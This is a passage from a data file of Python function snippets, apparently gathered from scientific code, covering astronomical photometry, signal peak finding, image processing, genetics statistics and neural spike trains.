name=\"design_matrix\"\n )\n\n # Do a first pass at 27 days, just to find ridiculous outliers\n mod = fit_model(lc, return_model=True)\n mask = ~(lc - mod * lc.flux.unit).remove_outliers(return_mask=True, sigma=sigma)[1]\n\n # Loop over some periods we care about\n periods = 1 / np.linspace(1 / min_period, 1 / max_period, nperiods)\n ws = np.zeros((len(periods), dm.X.shape[1]))\n ws_err = np.zeros((len(periods), dm.X.shape[1]))\n ws_bkg = np.zeros((len(periods), dm.X.shape[1]))\n ws_err_bkg = np.zeros((len(periods), dm.X.shape[1]))\n\n for idx, period in enumerate(tqdm(periods, desc=\"Running pixels in aperture\")):\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n )\n ws[idx], ws_err[idx] = fit_model(lc, mask=mask)\n ws_bkg[idx], ws_err_bkg[idx] = fit_model(lc_bkg, mask=mask)\n power = (ws[:, -2] ** 2 + ws[:, -1] ** 2) ** 0.5\n am = np.argmax(power)\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / periods[am], bias=False, nterms=1\n )\n mod = dm.X[:, :-2].dot(ws[am][:-2])\n\n power_bkg = (ws_bkg[:, -2] ** 2 + ws_bkg[:, -1] ** 2) ** 0.5\n\n r = {\n \"periods\": periods,\n \"power\": power,\n \"raw_lc\": lc,\n \"power_bkg\": power_bkg,\n \"raw_lc_bkg\": lc_bkg,\n \"corr_lc\": lc - mod * lc.flux.unit + 1,\n \"period_at_max_power\": periods[am],\n }\n\n return r", "def _compute_stack_mean_and_uncertainty(self, starMask, iters=5,\n backgroundClipSigma=5.0, starClipSigma=40.0):\n # Extract the number of images (nz) and the shape of the images (ny, nx)\n nz, ny, nx = self.shape\n\n # Test for the number of bits in each pixel (or just assum 64 bits)\n bitsPerPixel = 64\n\n # Compute the number of rows to process at a given time\n numberOfRows, numSections = self._get_number_of_rows_to_process(bitsPerPixel)\n print('Processing stack in {0} 
sections of {1} rows'.format(\n numSections, numberOfRows))\n\n # Compute the sigma-clipping starting points and increments\n tmp = self._get_sigma_clip_start_and_steps(\n iters=iters,\n backgroundClipSigma=backgroundClipSigma,\n starClipSigma=starClipSigma\n )\n backgroundClipStart, backgroundClipStep, starClipStart, starClipStep = tmp\n\n # Initalize an empty array to hold the output\n outMean = np.zeros((ny, nx))\n outUncert = np.zeros((ny, nx))\n\n for sectionNumber in range(numSections):\n print('Starting section number {0}'.format(sectionNumber+ 1 ))\n # Compute the range of rows to extract\n startRow, endRow = self._get_start_and_end_rows(\n sectionNumber, numberOfRows\n )\n\n # Extract the data for this section\n dataSubStack = self._extract_data_sub_stack(startRow, endRow)\n\n # Extract the uncertainty for this section\n uncertSubStack = self._extract_uncert_sub_stack(startRow, endRow)\n\n # Extract the starSubMask for this section\n if issubclass(type(starMask), np.ndarray):\n starSubMask = starMask[startRow:endRow, :]\n elif issubclass(type(starMask), bool):\n starSubMask = starMask\n\n # Build the bad pixel mask for this subStack\n dataSubStack = self._construct_sub_stack_bad_pixel_mask(\n dataSubStack,\n starSubMask,\n iters=iters,\n backgroundClipStart=backgroundClipStart,\n backgroundClipStep=backgroundClipStep,\n starClipStart=starClipStart,\n starClipStep=starClipStep\n )\n\n # Compute the mean and uncertainty of the masked array\n mean, uncert = self._compute_masked_mean_and_uncertainty(\n dataSubStack, uncertSubStack)\n\n # Store the result in the output\n outMean[startRow:endRow, :] = mean\n outUncert[startRow:endRow, :] = uncert\n\n return outMean, outUncert", "def autoExtract(array):#Extract signal from a 1D-array\n \n derivmax = medianFilter(derivation(array)).argmax()\n derivmin = medianFilter(derivation(array)).argmin()\n i = 0\n extraction = []\n while i < len(array) or i <= 300:\n if i >= derivmax and i <= derivmin:\n extraction.append(array[i])\n i = i+1\n extraction = np.array(extraction)\n derivmax = derivmax\n derivmin = derivmin\n return extraction", "def array_to_spiketrains(array, bin_size):\n stList = []\n for trial in range(len(array)):\n trialList = []\n for channel in range(array.shape[2]):\n times = np.nonzero(array[trial, :, channel])[0]\n counts = array[trial, times, channel].astype(int)\n times = np.repeat(times, counts)\n st = neo.SpikeTrain(times*bin_size*pq.ms, t_stop=array.shape[1]*bin_size*pq.ms)\n trialList.append(st)\n stList.append(trialList)\n return stList", "def _random_jitter(self, sampling_results, img_metas, amplitude=0.15):\n for sampling_result, img_meta in zip(sampling_results, img_metas):\n bboxes = sampling_result.pos_bboxes\n random_offsets = bboxes.new_empty(bboxes.shape[0], 4).uniform_(\n -amplitude, amplitude)\n # before jittering\n cxcy = (bboxes[:, 2:4] + bboxes[:, :2]) / 2\n wh = (bboxes[:, 2:4] - bboxes[:, :2]).abs()\n # after jittering\n new_cxcy = cxcy + wh * random_offsets[:, :2]\n new_wh = wh * (1 + random_offsets[:, 2:])\n # xywh to xyxy\n new_x1y1 = (new_cxcy - new_wh / 2)\n new_x2y2 = (new_cxcy + new_wh / 2)\n new_bboxes = torch.cat([new_x1y1, new_x2y2], dim=1)\n # clip bboxes\n max_shape = img_meta['img_shape']\n if max_shape is not None:\n new_bboxes[:, 0::2].clamp_(min=0, max=max_shape[1] - 1)\n new_bboxes[:, 1::2].clamp_(min=0, max=max_shape[0] - 1)\n\n sampling_result.pos_bboxes = new_bboxes\n return sampling_results", "def FAP_dist(peak_amps, Nbins=1000):\n zmin = np.linspace(0, peak_amps.max(), Nbins)\n FAP 
= np.zeros(Nbins)\n for i in range(Nbins):\n FAP[i] = (peak_amps > zmin[i]).sum()\n FAP /= peak_amps.shape[0] # Normalize\n return zmin, FAP", "def get_mean_in_time(trajectories, nb_bins=15, freq_range=[0.4, 0.6]):\n # Create bins and select trajectories going through the freq_range\n time_bins = np.linspace(-950, 2000, nb_bins)\n trajectories = [traj for traj in trajectories if np.sum(np.logical_and(\n traj.frequencies >= freq_range[0], traj.frequencies < freq_range[1]), dtype=bool)]\n\n # Offset trajectories to set t=0 at the point they are seen in the freq_range and adds all the frequencies / times\n # to arrays for later computation of mean\n t_traj = np.array([])\n f_traj = np.array([])\n for traj in trajectories:\n idx = np.where(np.logical_and(traj.frequencies >=\n freq_range[0], traj.frequencies < freq_range[1]))[0][0]\n traj.t = traj.t - traj.t[idx]\n t_traj = np.concatenate((t_traj, traj.t))\n f_traj = np.concatenate((f_traj, traj.frequencies))\n\n # Binning of all the data in the time bins\n filtered_fixed = [traj for traj in trajectories if traj.fixation == \"fixed\"]\n filtered_lost = [traj for traj in trajectories if traj.fixation == \"lost\"]\n freqs, fixed, lost = [], [], []\n for ii in range(len(time_bins) - 1):\n freqs = freqs + [f_traj[np.logical_and(t_traj >= time_bins[ii], t_traj < time_bins[ii + 1])]]\n fixed = fixed + [len([traj for traj in filtered_fixed if traj.t[-1] < time_bins[ii]])]\n lost = lost + [len([traj for traj in filtered_lost if traj.t[-1] < time_bins[ii]])]\n\n # Computation of the mean in each bin, active trajectories contribute their current frequency,\n # fixed contribute1 and lost contribute 0\n mean = []\n for ii in range(len(freqs)):\n mean = mean + [np.sum(freqs[ii]) + fixed[ii]]\n mean[-1] /= (len(freqs[ii]) + fixed[ii] + lost[ii])\n\n nb_active = [len(freq) for freq in freqs]\n nb_dead = [fixed[ii] + lost[ii] for ii in range(len(fixed))]\n\n return 0.5 * (time_bins[1:] + time_bins[:-1]), mean, nb_active, nb_dead", "def get_peaks(self, spectrum, amplitude):\n peaks = []\n average_noise_level = self._get_average_noise_level(amplitude)\n\n for i, a in enumerate(amplitude):\n noise = next(average_noise_level)\n\n if a / noise > self.threshold and self._is_max(amplitude[i-1], a, amplitude[i+1]):\n peaks.append(tuple([spectrum[i], a, noise]))\n\n peaks.sort(reverse=True, key=lambda x: x[1] / x[2])\n \n if len(peaks) > self.peaks_arr_size:\n del peaks[self.sample_arr_size:]\n\n return peaks", "def testStatisticsRamp(self):\n\n \n nx = 101\n ny = 64\n img = afwImage.ImageF(afwGeom.Extent2I(nx, ny))\n \n z0 = 10.0\n dzdx = 1.0\n mean = z0 + (nx/2)*dzdx\n stdev = 0.0\n for y in range(ny):\n for x in range(nx):\n z = z0 + dzdx*x\n img.set(x, y, z)\n stdev += (z - mean)*(z - mean)\n\n stdev = math.sqrt(stdev/(nx*ny - 1))\n \n stats = afwMath.makeStatistics(img, afwMath.NPOINT | afwMath.STDEV | afwMath.MEAN)\n testmean = stats.getValue(afwMath.MEAN)\n teststdev = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(stats.getValue(afwMath.NPOINT), nx*ny)\n self.assertEqual(testmean, mean)\n self.assertEqual(teststdev, stdev )\n \n stats = afwMath.makeStatistics(img, afwMath.STDEV | afwMath.MEAN | afwMath.ERRORS)\n mean, meanErr = stats.getResult(afwMath.MEAN)\n sd = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(mean, img.get(nx/2, ny/2))\n self.assertEqual(meanErr, sd/math.sqrt(img.getWidth()*img.getHeight()))\n \n # ===============================================================================\n # sjb code for percentiles and clipped stats\n \n stats 
= afwMath.makeStatistics(img, afwMath.MEDIAN)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEDIAN))\n \n stats = afwMath.makeStatistics(img, afwMath.IQRANGE)\n self.assertEqual(dzdx*(nx - 1)/2.0, stats.getValue(afwMath.IQRANGE))\n \n stats = afwMath.makeStatistics(img, afwMath.MEANCLIP)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEANCLIP))", "def skystats(stamp):\n\t\n\tif isinstance(stamp, galsim.Image):\n\t\ta = stamp.array\n\t\t# Normally there should be a .transpose() here, to get the orientation right.\n\t\t# But in the present case it doesn't change anything, and we can skip it.\n\telse:\n\t\ta = stamp # Then we assume that it's simply a numpy array.\n\t\n\tedgepixels = np.concatenate([\n\t\t\ta[0,1:], # left\n\t\t\ta[-1,1:], # right\n\t\t\ta[:,0], # bottom\n\t\t\ta[1:-1,-1] # top\n\t\t\t])\n\tassert len(edgepixels) == 2*(a.shape[0]-1) + 2*(a.shape[0]-1)\n\n\t# And we convert the mad into an estimate of the Gaussian std:\n\treturn {\n\t\t\"std\":np.std(edgepixels), \"mad\": 1.4826 * mad(edgepixels),\n\t\t\"mean\":np.mean(edgepixels), \"med\":np.median(edgepixels),\n\t\t\"stampsum\":np.sum(a)\n\t\t}", "def filter_gaps(msa_obj, gap_cutoff=0.5):\n # msa must be a list\n import numpy as np\n alphabet = \"ARNDCQEGHILKMFPSTWYV-\"\n states = len(alphabet)\n tmp = (msa_obj == states - 1).astype(np.float)\n non_gaps = np.where(np.sum(tmp.T, -1).T / msa_obj.shape[0] < gap_cutoff)[0]\n return msa_obj[:, non_gaps], non_gaps", "def process_tir_image(ds, data_res, t_thresh=-50, min_mcs_size=5000):\n ctt = (ds['tb']).squeeze()-273.15\n min_pix_nb = min_mcs_size / data_res**2\n\n max_pix_nb = 300000 / data_res**2 # this is to capture satellite artefacts that come in large contiguous stripes.\n labels, goodinds = mcs_define(ctt.values, t_thresh, minmax_area=[min_pix_nb, max_pix_nb]) # 7.7x7.7km = 64km2 per pix in gridsat? 
83 pix is 5000km2\n dic = dictionary()\n #plt.figure()\n #plt.pcolormesh(labels)\n #plt.colorbar()\n #plt.show()\n for g in goodinds:\n\n if g==0:\n continue\n\n pos = np.where(labels==g)\n npos = np.where(labels!=g)\n datestr = str(int(ctt['time.year'].values))+'-'+str(int(ctt['time.month'].values)).zfill(2)+'-'+str(int(ctt['time.day'].values)).zfill(2)+'_'+\\\n str(int(ctt['time.hour'].values)).zfill(2)+':'+str(int(ctt['time.minute'].values)).zfill(2)\n \n dic['date'].append(datestr)\n dic['month'].append(int(ctt['time.month']))\n dic['hour'].append(int(ctt['time.hour']))\n dic['year'].append(int(ctt['time.year']))\n dic['day'].append(int(ctt['time.day']))\n dic['minute'].append(int(ctt['time.minute']))\n\n storm = ctt.copy()\n storm.values[npos] = np.nan\n tmin_pos = np.nanargmin(storm.values)\n tpos_2d = np.unravel_index(tmin_pos, storm.shape)\n \n latmin = np.nanmin(ctt.lat.values[pos[0]])\n latmax = np.nanmax(ctt.lat.values[pos[0]])\n lonmin = np.nanmin(ctt.lon.values[pos[1]])\n lonmax = np.nanmax(ctt.lon.values[pos[1]])\n dic['area'].append(np.sum(np.isfinite(storm.values))*data_res**2)\n dic['70area'].append(np.sum(storm.values<=-70)*data_res**2)\n dic['minlon'].append(lonmin)\n dic['minlat'].append(latmin)\n dic['maxlon'].append(lonmax)\n dic['maxlat'].append(latmax)\n dic['clon'].append(lonmin + (lonmax - lonmin)/2)\n dic['clat'].append(latmin + (latmax - latmin)/2)\n dic['tmin'].append(np.nanmin(storm))\n dic['tminlat'].append(float(ctt.lat[tpos_2d[0]].values))\n dic['tminlon'].append(float(ctt.lon[tpos_2d[1]].values))\n dic['tmean'].append(float(np.nanmean(storm)))\n dic['tp1'].append(float(np.nanpercentile(storm, 1)))\n dic['tp99'].append(float(np.nanpercentile(storm, 99)))\n dic['stormID'].append(datestr + '_' + str(g))\n dic['cloudMask'].append(labels==g)\n dic['tir'].append(storm.values)\n\n # for k in dic.keys():\n # print(k, len(dic[k]))\n return dic", "def spectrum_multi_taper(self):\r\n if np.iscomplexobj(self.input.data):\r\n psd_len = self.input.shape[-1] \r\n dt = complex\r\n else:\r\n psd_len = self.input.shape[-1] / 2 + 1\r\n dt = float\r\n\r\n #Initialize the output\r\n spectrum_multi_taper = np.empty((self.input.shape[:-1] + (psd_len,)),\r\n dtype=dt)\r\n\r\n #If multi-channel data:\r\n if len(self.input.data.shape) > 1:\r\n for i in range(self.input.data.shape[0]):\r\n # 'f' are the center frequencies of the frequency bands\r\n # represented in the MT psd. 
These are identical in each\r\n # iteration of the loop, so they get reassigned into the same\r\n # variable in each iteration:\r\n f, spectrum_multi_taper[i], _ = tsa.multi_taper_psd(\r\n self.input.data[i],\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n else:\r\n f, spectrum_multi_taper, _ = tsa.multi_taper_psd(self.input.data,\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n\r\n return f, spectrum_multi_taper", "def n_finder(gt_mat, x, eps):\n numsnps = int(0.9*gt_mat.shape[0])\n assert(x < numsnps)\n assert(eps > 0 and eps<= 1.0)\n indices = np.random.choice(numsnps, size=x, replace=False)\n n = 0\n avg_array = np.zeros(gt_mat.shape[0])\n going = True\n while going:\n r2_list = [np.corrcoef(gt_mat[i,:],gt_mat[i+n,:])[0,1]**2 for i in indices]\n avg_array[n] = np.nanmean(r2_list)\n n += 1\n if np.mean(r2_list) < eps:\n going = False \n return n,avg_array[:n]", "def estimate_peaks(samples, thresh=0.02):\n pks = find_peaks(samples, prominence=thresh)\n npks = np.ones(len(samples), dtype=bool)\n npks[pks[0]] = False\n return np.mean(samples[pks[0]])/np.mean(samples[npks]), len(pks[0])", "def aperphot(fn, timekey=None, pos=[0,0], dap=[2,4,6], mask=None, verbose=False, nanval=999, resamp=None, retfull=False):\n # 2009-09-14 10:49 IJC: Created\n # 2010-01-15 14:20 IJC: Added numpy \"_string\" check\n # 2011-12-29 12:01 IJMC: Added peak pixel values to photometry report.\n # 2012-01-25 11:26 IJMC: Adding \"resamp\" option -- thanks to\n # K. Stevenson and J. Harrington of UCF for\n # the suggestion.\n # 2012-02-26 11:53 IJMC: Now return 'ntarg' and 'nsky' -- number of pixels used.\n # 2012-06-07 08:27 IJMC: 'peak' values are now corrected for the\n # resampling factor.\n # 2012-07-03 10:35 IJMC: Fixed a key bug: frames were not\n # correctly background-subtracted when\n # applying partial-pixel resampling.\n # 2012-10-19 13:41 IJMC: Documented 'retfull' option; changed default.\n # 2013-03-20 09:21 IJMC: More error-checking for saving header\n # keywords. Thanks to A. Weigel @\n # ETH-Zurich for catching this!\n\n from numpy import meshgrid, median,isfinite,sort,ndarray,string_\n import numpy as np\n import pyfits\n #from analysis import fixval\n from os import path\n from scipy import interpolate\n\n thisobs = phot()\n x0, y0 = pos\n dap_targ, dap_skyinner, dap_skyouter = dap\n if resamp is None or resamp<1:\n resamp = 1\n else:\n resamp = float(resamp)\n \n # Determine size:\n if isinstance(fn,str):\n nx = pyfits.getval(fn, 'NAXIS1')\n ny = pyfits.getval(fn, 'NAXIS2')\n elif isinstance(fn,ndarray):\n nx,ny = fn.shape\n\n nx0, ny0 = nx, ny\n nx = ((nx - 1)*resamp + 1.) # Avoid resampling at pixel locations\n ny = ((ny - 1)*resamp + 1.) # outside the original boundaries.\n\n # Generate or load masks:\n if mask==None:\n xx,yy = meshgrid(np.arange(ny)/resamp, np.arange(nx)/resamp)\n mask_targ = makemask(xx, yy, (x0, y0, dap_targ))\n mask_s1 = makemask(xx, yy, (x0,y0, dap_skyinner))\n mask_s2 = makemask(xx, yy, (x0,y0, dap_skyouter))\n mask_sky = mask_s2 - mask_s1\n else:\n mask_targ = mask==1\n mask_sky = mask==2\n if resamp>1:\n print \"In aperphot, resamp>1 and user-specified mask passed in... beware!\"\n\n # Load data frame:\n thisobs = phot()\n if isinstance(fn,ndarray):\n frame = fn\n elif isinstance(fn, str) or isinstance(fn,string_):\n if not path.isfile(fn):\n print \"file %s not found! 
exiting...\" % fn\n return thisobs\n frame = pyfits.getdata(fn)\n fixval(frame, nanval)\n\n # Resample data frame\n if resamp>1:\n frame0 = frame.copy()\n xx0 = range(nx0)\n yy0 = range(ny0)\n x1,y1 = np.arange(nx)/resamp, np.arange(ny)/resamp\n rectspline = interpolate.fitpack2.RectBivariateSpline(xx0, yy0, frame0, kx=1, ky=1, s=0)\n frame = rectspline(x1, y1)\n\n #from pylab import *\n #pdb.set_trace()\n # Measure background and aperture photometry\n thisbg, thisebg = estbg(frame, mask=mask_sky, plotalot=verbose, rout=[3,99])\n thisphot = (mask_targ*(frame - thisbg)).sum() /resamp/resamp\n peak = frame.max()\n peak_targ = (mask_targ * frame).max()\n peak_annulus = (mask_sky * frame).max()\n\n thisobs.bg=thisbg\n thisobs.ebg=thisebg\n thisobs.bgstr='phot.estbg: SDOM on bg histogram mean & dispersion after outlier rejection'\n thisobs.phot=thisphot\n thisobs.photstr='by-hand background-subtracted aperture photometry'\n thisobs.ntarg = mask_targ.sum()/resamp/resamp\n thisobs.nsky = mask_sky.sum()/resamp/resamp\n\n thisobs.peak = peak\n thisobs.peak_targ = peak_targ\n thisobs.peak_annulus = peak_annulus\n thisobs.peakstr = 'peak pixel value in frame'\n thisobs.peak_targstr = 'peak pixel value in target aperture'\n thisobs.peak_annulusstr = 'peak pixel value in sky annulus'\n thisobs.position = pos\n thisobs.positionstr = 'user-specified, zero-indexed pixel coordinates.'\n if isinstance(fn, str):\n header = pyfits.getheader(fn)\n if not timekey==None:\n if timekey in header: \n thisobs.time=header['timekey']\n thisobs.timestr='heliocentric modified julian date'\n if 'object' in header: thisobs.object = header['object']\n if 'exptime' in header: thisobs.exptime = header['exptime']\n thisobs.aper = dap\n thisobs.aperstr = 'target, inner, outer aperture diameters, in pixels.'\n thisobs.filename=fn\n thisobs.resamp = resamp\n if retfull:\n thisobs.mask_targ = mask_targ\n thisobs.mask_sky = mask_sky\n thisobs.frame = frame\n\n if verbose:\n from pylab import figure, colorbar\n from nsdata import imshow\n figure(); imshow(frame*mask_targ); colorbar()\n figure(); imshow(frame*mask_sky); colorbar()\n\n return thisobs", "def calc_tsunami(slip_result):\n gf = h5py.File('NA_CAS.hdf5', 'r')\n time_array = np.array(gf['time/timedata'])\n\n # dictionary for holding slip calculations\n scale_gf = []\n\n # declare empty array with max size\n ar_len = len(time_array)\n ar_width = get_array_size()\n\n tgf = np.zeros(shape=(ar_len, ar_width)) # tgf = tsunami green's function\n\n # loop over index adn slip value from slip array\n for i, slip in enumerate(slip_result):\n # print(i)\n # make sure slip is a float not string\n s = float(slip)\n\n # multiply slip by each subfault\n scale_gf.append(s * gf['GF/{:03}'.format(i)][:])\n\n # iterate over all the subfaults and add all subfaults together per site\n for sf in scale_gf:\n tgf += sf\n\n # return the slip_at_site array and the time array\n return (tgf, time_array)", "def combined_gaussian(amps, fwhms, means, x):\n if len(amps) > 0.:\n for i in range(len(amps)):\n gauss = gaussian(amps[i], fwhms[i], means[i], x)\n if i == 0:\n combined_gauss = gauss\n else:\n combined_gauss += gauss\n else:\n combined_gauss = np.zeros(len(x))\n return combined_gauss", "def sim_hits(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n trajs = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n traj = list()\n traj.append(curr)\n while curr not in targ_list:\n 
weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n traj.append(curr)\n \n if len(traj)>=cutoff:\n # traj=[nan]\n break\n \n trajs.append(array(traj))\n\n return trajs", "def amp_by_time(sig, fs, f_range, hilbert_increase_n=False, remove_edges=True, **filter_kwargs):\n\n sig_filt, kernel = filter_signal(sig, fs, infer_passtype(f_range), f_range=f_range,\n remove_edges=False, return_filter=True, **filter_kwargs)\n\n amp = np.abs(robust_hilbert(sig_filt, increase_n=hilbert_increase_n))\n\n if remove_edges:\n amp = remove_filter_edges(amp, len(kernel))\n\n return amp", "def extract_distribution(ptree):\n w_apx = np.zeros(ptree.shape)\n FlattenPtreeRecur(ptree, w_apx, 1, 1)\n return w_apx", "def processImage(imgs):\r\n imgs = imgs.astype(np.float32)\r\n for i, img in enumerate(imgs):\r\n m = img.mean()\r\n s = img.std()\r\n imgs[i] = (img - m) / s\r\n return imgs", "def learnGauss(metricArray): \n fit = gaussReg() \n n= 100 #You should probably change this...\n overlap = 0.3 \n imageSize = [100,400]\n densMap(fit, metricArray, n, overlap, imageSize )\n overlayMap('SmallTile.jpg', 'ContourPlot.jpg') \n # Final map is saved as OverlayMap.jpg", "def calculate_meanpT_fluc(dN_array, pT_array, pT_min=0.0, pT_max=3.0):\n npT_interp = 50\n pT_inte_array = linspace(pT_min, pT_max, npT_interp)\n\n nev, npT = dN_array.shape\n mean_pT_array = zeros(nev)\n for iev in range(nev):\n dN_interp = exp(interp(pT_inte_array, pT_array[iev, :],\n log(dN_array[iev, :] + 1e-30)))\n mean_pT_array[iev] = (sum(pT_inte_array**2.*dN_interp)\n /sum(pT_inte_array*dN_interp))\n\n # compute the error using jack-knife\n rn_array = zeros(nev)\n for iev in range(nev):\n array_idx = [True]*nev\n array_idx[iev] = False\n array_idx = array(array_idx)\n rn_ev = (std(mean_pT_array[array_idx])\n /(mean(mean_pT_array[array_idx]) + 1e-15))\n rn_array[iev] = rn_ev\n rn_mean = mean(rn_array, axis=0)\n rn_err = sqrt((nev - 1.)/nev*sum((rn_array - rn_mean)**2.))\n return([rn_mean, rn_err])", "def _find_peaks_heuristic(phnorm):\n median_scale = np.median(phnorm)\n\n # First make histogram with bins = 0.2% of median PH\n hist, bins = np.histogram(phnorm, 1000, [0, 2*median_scale])\n binctr = bins[1:] - 0.5 * (bins[1] - bins[0])\n\n # Scipy continuous wavelet transform\n pk1 = np.array(sp.signal.find_peaks_cwt(hist, np.array([2, 4, 8, 12])))\n\n # A peak must contain 0.5% of the data or 500 events, whichever is more,\n # but the requirement is not more than 5% of data (for meager data sets)\n Ntotal = len(phnorm)\n MinCountsInPeak = min(max(500, Ntotal//200), Ntotal//20)\n pk2 = pk1[hist[pk1] > MinCountsInPeak]\n\n # Now take peaks from highest to lowest, provided they are at least 40 bins from any neighbor\n ordering = hist[pk2].argsort()\n pk2 = pk2[ordering]\n peaks = [pk2[0]]\n\n for pk in pk2[1:]:\n if (np.abs(peaks-pk) > 10).all():\n peaks.append(pk)\n peaks.sort()\n return np.array(binctr[peaks])", "def get_mean_image_population(caps_directory, tsv, template_image):\n import pandas as pd\n import os\n import nibabel as nib\n import numpy as np\n\n if not os.path.exists(os.path.join(caps_directory, 'group')):\n os.makedirs(os.path.join(caps_directory, 'group'))\n\n df = pd.read_csv(tsv, sep='\\t')\n if ('session_id' != list(df.columns.values)[1]) and (\n 'participant_id' != list(df.columns.values)[0]):\n raise Exception('the data file is not in the correct format.')\n participant_id = list(df['participant_id'])\n session_id = list(df['session_id'])\n\n # get the template image info:\n template_image_data = 
nib.load(template_image)\n template_image_array = template_image_data.get_data()\n header = template_image_data.header\n affine = template_image_data.affine\n\n final_array = np.empty((template_image_array.shape[0], template_image_array.shape[1], template_image_array.shape[2], len(participant_id)))\n\n for i in range(len(participant_id)):\n image = os.path.join(caps_directory, 'subjects', participant_id[i], session_id[i], 't1', 'preprocessing_dl', participant_id[i] + '_' + session_id[i] + '_space-MNI_res-1x1x1.nii.gz')\n image_data = nib.load(image)\n image_array = image_data.get_data()\n final_array[..., i] = image_array\n\n # take the mean of image\n final_mean_array = np.mean(final_array, axis=3)\n\n # save the mean image as nifti\n mean_image = nib.Nifti1Image(final_mean_array, affine, header)\n nib.save(mean_image, os.path.join(caps_directory, 'group', 'mean_population.nii.gz'))", "def make_photon_arrays(path, numevents):\n xcoords = []\n zcoords = []\n \n nsipmarrays = []\n nabsarrays = []\n \n for filename in os.listdir(path):\n\n photondata = np.loadtxt(path+'/'+filename,delimiter=',',usecols=[1,4])\n\n coords = filename[0:8]\n\n arraylen = len(photondata.flatten('F'))\n \n nsipmphotons = photondata.flatten('F')[numevents:arraylen]\n #print(len(nsipmphotons))\n nabsphotons = photondata.flatten('F')[0:numevents] \n \n nsipmarrays.append(nsipmphotons)\n nabsarrays.append(nabsphotons)\n \n x = re.findall('(-[0-9]+)x',coords) \n \n if bool(x) == False:\n x = re.findall('([0-9]+)x', coords)\n \n z = re.findall('(-[0-9]+)z',coords) \n\n if bool(z) == False:\n z = re.findall('([0-9]+)z',coords)\n\n xcoords.append(x[0])\n zcoords.append(z[0])\n \n xcoords = np.array(xcoords).astype(np.float)\n zcoords = np.array(zcoords).astype(np.float)\n \n return xcoords, zcoords, nsipmarrays, nabsarrays", "def Read_AGSS(fln, oversample=None, sigma=None, tophat=None, thin=None, wave_cut=None, convert=None, linlog=False):\n ## Opening the file table\n hdu = pyfits.open(fln)\n\n ## Extracting the wavelength from the header\n hdr = hdu[0].header\n wav = hdr['CRVAL1'] + np.arange(hdr['NAXIS1'], dtype=float) * hdr['CDELT1']\n\n ## Extracting the data. 
grid.shape = n_mu, n_wavelength\n grid = hdu[0].data\n\n ## Trim the unwanted wavelength range\n if wave_cut is not None:\n inds = (wav >= wave_cut[0]) * (wav <= wave_cut[1])\n grid = grid[:,inds]\n wav = wav[inds]\n\n ## Oversample the spectrum if requested\n if oversample is not None and oversample != 1:\n #grid = scipy.ndimage.zoom(grid, oversample, order=1, mode='reflect')\n #wav = np.linspace(wav[0], wav[-1], wav.size*oversample)\n interp = scipy.interpolate.UnivariateSpline(wav, grid, k=1, s=0)\n wav = np.linspace(wav[0], wav[-1], wav.size*oversample+1)\n grid = interp(wav)\n\n ## Smooth the spectrum if requested\n logger.log(6, \"Original: sigma {}, tophat {}\".format(sigma,tophat))\n if sigma is not None or tophat is not None:\n bin = wav[1]-wav[0]\n ## We have to convert values to bin units\n if sigma is None:\n sigma = 0.\n else:\n sigma = sigma/bin\n if tophat is None:\n tophat = 1\n else:\n tophat = int(tophat/bin + 0.5)\n tophat = 1 if tophat < 1 else tophat\n logger.log(6, \"Bin converted: bin {}, sigma {}, tophat {}\".format(bin,sigma,tophat))\n grid = Utils.Series.Convolve_gaussian_tophat(grid, sigma=sigma, top=tophat)\n\n ## Thin the spectrum if requested\n if thin is not None:\n grid = grid[::thin]\n wav = wav[::thin]\n\n ## Convert to logarithmic (velocity) scale so that Doppler boosting is linear\n if linlog:\n new_wav, z = Utils.Series.Resample_linlog(wav)\n ws, inds = Utils.Series.Getaxispos_vector(wav, new_wav)\n wav = new_wav\n grid = grid.take(inds, axis=-1)*(1-ws) + grid.take(inds+1, axis=-1)*ws\n else:\n z = None\n if convert is not None:\n print( \"Saving the data into \"+fln+convert )\n np.savetxt(fln+convert,np.vstack((wav,np.log10(grid))).T)\n return grid, wav, z", "def locate_traps(graph):\n traps = []\n for node in graph:\n if len(graph[node]) < 2:\n traps.append(node)\n continue\n else:\n neighbours = graph[node]\n\n # copy graph and delete the node\n temp_graph = copy.deepcopy(graph)\n for neighbour in neighbours:\n temp_graph[neighbour].remove(node)\n temp_graph.pop(node)\n\n # heuristic: if you can BFS from a node's neighbour to all other neighbours in < 10 steps (after removing that node), then graph is still connected => not a trappable node\n BFS_q = deque()\n visited = [[False] * 12 for _ in range(10)]\n visited[neighbours[0][1]][neighbours[0][0]] = True\n BFS_q.append(neighbours[0])\n counter = 0\n while len(BFS_q) > 0 and counter < 10:\n u = BFS_q.popleft()\n for BFS_neighbour in temp_graph[u]:\n if not visited[BFS_neighbour[1]][BFS_neighbour[0]]:\n visited[BFS_neighbour[1]][BFS_neighbour[0]] = True\n BFS_q.append(BFS_neighbour)\n counter += 1\n for neighbour in neighbours:\n if visited[neighbour[1]][neighbour[0]] is False:\n traps.append(node)\n continue\n return (traps)", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n img = cropPic(img, levels)\r\n pyrLst = [img]\r\n gaussian = gaussianKer(5)\r\n\r\n for i in range(1, levels):\r\n I_temp = cv2.filter2D(pyrLst[i - 1], -1, gaussian, cv2.BORDER_REPLICATE)\r\n I_temp = I_temp[::2, ::2]\r\n pyrLst.append(I_temp)\r\n return pyrLst", "def adaptiveGaussianThreshold(img):\n\tgray = grayscale(img)\n\tgray = cv2.medianBlur(gray, 5)\n\tthresh = cv2.adaptiveThreshold(gray, 255, 